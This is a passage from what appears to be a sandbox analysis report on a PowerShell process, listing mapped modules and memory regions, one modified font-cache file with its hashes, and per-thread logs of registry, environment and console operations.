| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| powershell.exe | 0x13f950000 | 0x13f9c6fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fedef10000 | 0x7fedf0a4fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x7fedf0b0000 | 0x7fedf21bfff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7fedf220000 | 0x7fedf8c4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fedf8d0000 | 0x7fedf90dfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fedf910000 | 0x7fedfa27fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fedfa30000 | 0x7fedfc45fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7fedfc50000 | 0x7fedfd34fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fedfd40000 | 0x7fedfde9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fedfdf0000 | 0x7fedfe21fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fedfe30000 | 0x7fedfe98fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7fedfea0000 | 0x7fee01cdfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fee01d0000 | 0x7fee0d2cfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee0d30000 | 0x7fee0de1fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7fee0df0000 | 0x7fee1812fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee1820000 | 0x7fee26fbfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fee2980000 | 0x7fee331cfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee61d0000 | 0x7fee6268fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fef30b0000 | 0x7fef311efff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x7fef8e40000 | 0x7fef8e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x7fef8e50000 | 0x7fef8e83fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x7fef9b40000 | 0x7fef9bbffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7fef9bc0000 | 0x7fef9bcefff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefb340000 | 0x7fefb396fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7fefb730000 | 0x7fefb73afff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7fefb760000 | 0x7fefb778fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbb00000 | 0x7fefbb2cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefc510000 | 0x7fefc63bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefcf30000 | 0x7fefcf4dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7fefd980000 | 0x7fefd9a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefdce0000 | 0x7fefdd15fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefddd0000 | 0x7fefdde9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff2f0000 | 0x7feff4c6fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007ff00010000 | 0x7ff00010000 | 0x7ff0001ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00020000 | 0x7ff00020000 | 0x7ff0002ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff000cffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000d0000 | 0x7ff000d0000 | 0x7ff000dffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000e0000 | 0x7ff000e0000 | 0x7ff0014ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00150000 | 0x7ff00150000 | 0x7ff0015ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00160000 | 0x7ff00160000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff00000 | 0x7fffff00000 | 0x7fffff0ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff9ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffffac000 | 0x7fffffac000 | 0x7fffffadfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd4000 | 0x7fffffd4000 | 0x7fffffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd6000 | 0x7fffffd6000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 64 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\gdipfontcachev1.dat | 109.69 KB |
MD5:
8c07b597e04adb6ef1c7a91e611668d8
SHA1: 03bfce03604869383ecb864c4d8ab9b99d4af8c8 SHA256: 63304f19e0ad5ec509b7e5484ec4074b451db2379f2838de3b4b2c14c8b6dd8c SSDeep: 1536:A2cnwUXHgTlmIUxyX337I5NZjP4LMLzZ5KsLJ:PTArrHvLJ |
|
|
Threads
Thread 0xb68
104
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Thread 0xb84
38
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, base_address = 0x13f950000 |
|
2 |
Thread 0xb94
59
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
27 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PATH |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Module | Get Handle | module_name = c:\windows\system32\user32.dll, base_address = 0x77a20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = DefWindowProcW, address_out = 0x77c6b0ac |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, base_address = 0x13f950000 |
|
2 | |
| Window | Create | class_name = WindowsForms10.Window.8.app.0.1569a64, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgJITDebugLaunchSetting, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgManagedDebugger, type = REG_NONE |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, base_address = 0x13f950000 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Write | filename = CONOUT$, size = 2 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Write | filename = CONOUT$, size = 2 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 |
